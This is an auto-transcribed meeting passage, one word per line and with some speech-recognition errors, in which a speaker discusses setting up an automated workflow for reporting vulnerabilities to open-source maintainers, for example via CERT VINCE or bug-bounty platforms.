perhaps
get
some
I
mean
and
get
assimilated
with
some
of
the
other
efforts
that
we
are
doing
and
we
can
figure
out
a
common
ground
yeah.
B
I
I
would
love
so
so
we've
talked
about
this
in
like
now
like
five
or
six
different
forums.
I
would
really
like
to
land
on
what
the
correct
workflow
for
reporting
vulnerabilities
to
maintainers
in
an
automated
way.
B,
because
as
soon
as
we
can
answer
that
question,
we
feel
good
about
the
answer.
Then
we
can,
you
know,
execute
on
it
like
that.
That
kind
of
takes
away
the
you
know
the
longest
on
a
poem
attempt
is
that
is
that
back
and
forth.
B
So
whether
that's
you
know
if,
if
GitHub
ever
gets
private
issues,
that
would
be
great
if
Cirque
Vince,
and
maybe
maybe
it's
there
already-
we
just
are
ignorant
of
it,
but
if
certain
events
can
can
be
used
for
this
I
mean
we
could
look
at
things
like
hacker
one
or
bug
crowd
or
one
of
those
where
kind
of
white
box
out
a
solution
where
they
handle
the
Last
Mile,
and
we
just
pay
them
for
that
service
like
that
works
too,
but
I
think
we
should
we
need
to.
B
If
we
don't
answer
that
question,
then
Omega
will
be
stemmied
by
like
an
ever
increasing
response
like
work
and
less
time
on
the
on
the
core
part
of
the
business.
So
that's
what
I'm
thinking,
let's
so
I
mentioned,
I
have
I
have
one
person,
starting
in
a
few
weeks,
I'm
hoping
to
have
another
person
start
also
in
a
few
weeks
as
we
get
that
team,
you
know,
so
it's
probably
the
early
December
so
about
a
month
you
know
a
month
or
so
from
now.
B
Let's,
let's
have
that
that
conversation
in
Earnest
and
and
start
driving
to
a
to
a
solution.
There.